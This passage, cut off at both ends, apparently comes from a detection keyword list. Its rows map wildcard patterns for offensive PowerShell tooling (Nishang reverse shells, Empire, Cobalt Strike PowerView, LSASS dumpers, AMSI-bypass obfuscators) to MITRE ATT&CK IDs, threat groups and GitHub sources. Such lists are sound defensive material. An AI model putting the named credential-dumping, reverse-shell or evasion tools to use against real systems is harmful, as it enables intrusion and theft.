T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1081,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-PoshRatHttp*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,1,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -*Invoke-PoshRatHttp*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-PoshRatHttps*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-PostExfil*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-PostExfil.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-PostExfil*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1142,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-PowerDump*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*Invoke-PowerDump*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-PowerDump*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1057,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-PowerDump*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-PowerExtract*,offensive_tool_keyword,powerextract,This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process,T1003 - T1055 - T1003.001 - T1055.012,TA0007 - TA0002,N/A,N/A,Credential Access,https://github.com/powerseb/PowerExtract,1,1,N/A,N/A,1,99,14,2023-07-19T14:24:41Z,2021-12-11T15:24:44Z -*Invoke-PowerShellHistoryCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-PowerShellIcmp*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-PowerShellIcmp.ps1*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,1,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -*Invoke-PowerShellTcp*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-PowerShellTcp*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-PowerShellTcp.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-PowerShellTcp.ps1*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,1,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -*Invoke-PowerShellTcpOneLine*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-PowerShellTcpOneLine.ps1*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,1,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -*Invoke-PowerShellTcpOneLineBind*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-PowershellTranscriptionCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-PowerShellUdp*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-PowerShellUdp.ps1*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,1,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -*Invoke-PowerShellUdpOneLine*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-PowerShellUdpOneLine.ps1*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,1,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -*Invoke-PowerShellWmi*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-PowerThIEf*,offensive_tool_keyword,Invoke-PowerThIEf,An IE Post Exploitation Library released at Steelcon in Sheffield 7th July 2018.,T1027 - T1053 - T1114 - T1059 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Credential Access,https://github.com/nettitude/Invoke-PowerThIEf,1,0,N/A,N/A,2,127,27,2018-09-12T11:26:06Z,2018-07-10T09:14:58Z -*Invoke-PPLDump*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Prasadhak*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-PrintDemon*,offensive_tool_keyword,Invoke-PrintDemon,This is an PowerShell Empire launcher PoC using PrintDemon and Faxhell. The module has the Faxhell DLL already embedded which leverages CVE-2020-1048 for privilege escalation. The vulnerability allows an unprivileged user to gain system-level privileges and is based on @ionescu007 PoC.,T1204 - T1208 - T1216 - T1055 - T1203,TA0001 - TA0007 - TA0004 - TA0005,N/A,N/A,Exploitation tools,https://github.com/BC-SECURITY/Invoke-PrintDemon,1,1,N/A,N/A,2,193,41,2020-10-17T17:04:24Z,2020-05-15T05:14:49Z -*Invoke-PrintNightmareCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-Privesc*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-PrivescAudit*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Invoke-PrivescCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-PrivescCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-PrivescCheck.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*invokeprocesshunter*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*Invoke-ProcessHunter*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*Invoke-ProcessHunter*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*invoke-processhunter*,offensive_tool_keyword,pywerview,A partial Python rewriting of PowerSploit PowerView,T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482,TA0007 - TA0009,N/A,N/A,Reconnaissance,https://github.com/the-useless-one/pywerview,1,1,N/A,N/A,8,738,102,2023-10-02T14:57:20Z,2016-07-06T13:25:09Z -*Invoke-ProcessScan*,offensive_tool_keyword,Invoke-ProcessScan,This script uses a list from the Equation Group leak from the shadow brokers to provide context to executeables that are running on a system.,T1059.001 - T1016 - T1547.001,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/vysecurity/Invoke-ProcessScan,1,1,N/A,N/A,1,42,22,2017-06-05T12:19:25Z,2017-06-03T18:36:30Z -*InvokePS1.bat*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*Invoke-ps2exe*,offensive_tool_keyword,PS2EXE,Module to compile powershell scripts to executables,T1027.001 - T1564.003 - T1564.005,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/MScholtes/PS2EXE,1,1,N/A,N/A,9,834,154,2023-09-26T15:03:14Z,2019-11-08T09:25:02Z -*Invoke-PSAmsiScan*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,1,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -*Invoke-PsExec*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-PsExec.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-PSexec.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-PsExec.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1095,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*invoke-psexecpayload*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - 